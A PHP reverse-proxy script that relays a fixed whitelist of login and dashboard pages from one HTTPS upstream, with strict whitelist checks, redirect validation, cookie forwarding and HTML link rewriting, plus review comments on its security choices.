
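<?php
// Reverse proxy for a small whitelist of pages on one fixed upstream.
//
// Flow: validate ?page= against $allowedPages, fetch that page from
// $remoteBaseUrl with curl (replaying upstream cookies from a per-session
// cookie jar), translate upstream redirects back into ?page= links, forward
// Content-Type / Set-Cookie to the browser, and rewrite same-site
// href/src/action URLs in HTML so they keep flowing through this script.
declare(strict_types=1);

session_start();

// Upstream cookie jar, one file per PHP session. session_id() is limited to
// [A-Za-z0-9,-] so it is safe inside a file name.
// NOTE(review): the jar stores the upstream session cookies in clear text in
// the temp dir and nothing here ever deletes it — consider removing it on
// logout / session destroy.
define('COOKIE_FILE', sys_get_temp_dir() . '/proxy_cookies_' . session_id() . '.txt');

// Only these upstream paths may be requested, redirected to, or rewritten.
$allowedPages = [
    'index.php', 'dashboard.php', 'login.php', 'logout.php', 'password.php',
];

// ?page= may arrive as an array (page[]=x); only a scalar string is accepted.
$page = $_GET['page'] ?? 'index.php';
if (!is_string($page)) {
    $page = '';
}
// The exact-match whitelist check below is the real control; stripping '..',
// NUL and '//' only normalises common traversal noise before the compare.
$pageClean = str_replace(['..', "\0", '//'], '', $page);
$pageClean = ltrim($pageClean, '/\\');

// strict comparison: the whitelist holds strings, never accept loose matches
if (!in_array($pageClean, $allowedPages, true)) {
    http_response_code(403);
    die("غير مسموح بالوصول لهذه الصفحة");
}

$remoteBaseUrl = 'https://sj.madarik.org/cce/';
$remoteUrl = $remoteBaseUrl . $pageClean;

$ch = curl_init($remoteUrl);
if ($ch === false) {
    http_response_code(500);
    die("خطأ في الاتصال بالخادم");
}
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
// Redirects are handled below so the target can be re-checked against the whitelist.
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
// The upstream is fixed to https; refuse any other scheme at the curl level too.
curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTPS);
// Without timeouts a stalled upstream pins a PHP worker for as long as it likes.
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_COOKIEFILE, COOKIE_FILE);
curl_setopt($ch, CURLOPT_COOKIEJAR, COOKIE_FILE);

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $postData = $_POST;
    $hasFiles = false;
    foreach ($_FILES as $key => $file) {
        $error = $file['error'] ?? UPLOAD_ERR_NO_FILE;
        // An optional file input left empty is simply not forwarded.
        if ($error === UPLOAD_ERR_NO_FILE) {
            continue;
        }
        // Only a single, successfully uploaded file is forwarded. Multi-file
        // inputs (name[]) arrive as arrays and are not supported here;
        // is_uploaded_file() refuses to forward anything that is not this
        // request's own upload.
        if (!is_string($file['tmp_name'] ?? null)
            || $error !== UPLOAD_ERR_OK
            || !is_uploaded_file($file['tmp_name'])) {
            curl_close($ch);
            http_response_code(400);
            die("خطأ في رفع الملف");
        }
        $postData[$key] = new CURLFile($file['tmp_name'], (string) ($file['type'] ?? ''), (string) ($file['name'] ?? ''));
        $hasFiles = true;
    }
    curl_setopt($ch, CURLOPT_POST, true);
    // With no files, send a normal urlencoded body: http_build_query keeps
    // nested fields (field[a]=1) intact, which the array form of
    // CURLOPT_POSTFIELDS would flatten to the string "Array".
    curl_setopt($ch, CURLOPT_POSTFIELDS, $hasFiles ? $postData : http_build_query($postData));
}

$response = curl_exec($ch);
if ($response === false) {
    // Keep the transport detail server-side; the client gets a generic error
    // so upstream host/TLS details are not disclosed.
    error_log('proxy: curl error for ' . $remoteUrl . ': ' . curl_error($ch));
    curl_close($ch);
    http_response_code(500);
    die("خطأ في الاتصال بالخادم");
}

$httpCode = (int) curl_getinfo($ch, CURLINFO_HTTP_CODE);
$headerSize = (int) curl_getinfo($ch, CURLINFO_HEADER_SIZE);
$headersRaw = substr($response, 0, $headerSize);
$body = substr($response, $headerSize);
curl_close($ch);

// Split the header block into lines once; name lookups are case-insensitive.
$headerLines = preg_split('/\r\n|\n/', trim($headersRaw)) ?: [];
// Returns the trimmed value of the first header named $name, or '' if absent.
$findHeader = static function ($name) use ($headerLines) {
    foreach ($headerLines as $line) {
        if (stripos($line, $name . ':') === 0) {
            return trim(substr($line, strlen($name) + 1));
        }
    }
    return '';
};

// Upstream redirects: turn them back into a ?page= link, but only when the
// target is itself whitelisted; otherwise refuse rather than open-redirect.
if (in_array($httpCode, [301, 302, 303, 307, 308], true)) {
    $location = $findHeader('Location');
    if ($location !== '') {
        $path = parse_url($location, PHP_URL_PATH);
        $redirectPage = is_string($path) ? basename($path) : '';
        if (in_array($redirectPage, $allowedPages, true)) {
            header("Location: ?page=" . urlencode($redirectPage));
            exit;
        }
        http_response_code(403);
        die("إعادة توجيه غير مصرح بها");
    }
}

// Do not mask upstream errors (401/404/500) as a 200 from the proxy.
if ($httpCode >= 400) {
    http_response_code($httpCode);
}

// Forward only Content-Type and Set-Cookie. Set-Cookie is emitted with
// replace=false: header() would otherwise keep just the last of several
// upstream cookies.
foreach ($headerLines as $line) {
    if (stripos($line, 'Content-Type:') === 0) {
        header(trim($line));
    } elseif (stripos($line, 'Set-Cookie:') === 0) {
        header(trim($line), false);
    }
}

// Rewrite same-site href/src/action URLs in HTML so they go through the proxy.
if (stripos($findHeader('Content-Type'), 'text/html') === 0) {
    $rewritten = preg_replace_callback(
        '/(href|src|action)\s*=\s*([\'"])(.*?)\2/i',
        static function (array $m) use ($allowedPages) {
            $full = $m[0];
            $attr = $m[1];
            $quote = $m[2];
            $url = $m[3];
            // Absolute, protocol-relative and mailto: links are left untouched.
            if (preg_match('/^(https?:)?\/\//i', $url) || strpos($url, 'mailto:') === 0) {
                return $full;
            }
            $path = parse_url($url, PHP_URL_PATH);
            if (!is_string($path)) {
                return $full;
            }
            $cleanUrl = ltrim($path, '/\\');
            if (in_array($cleanUrl, $allowedPages, true)) {
                return $attr . '=' . $quote . '?page=' . urlencode($cleanUrl) . $quote;
            }
            return $full;
        },
        $body
    );
    // preg_replace_callback returns null on a PCRE error (e.g. backtrack limit);
    // serve the unmodified body rather than an empty page in that case.
    if ($rewritten !== null) {
        $body = $rewritten;
    }
}

echo $body;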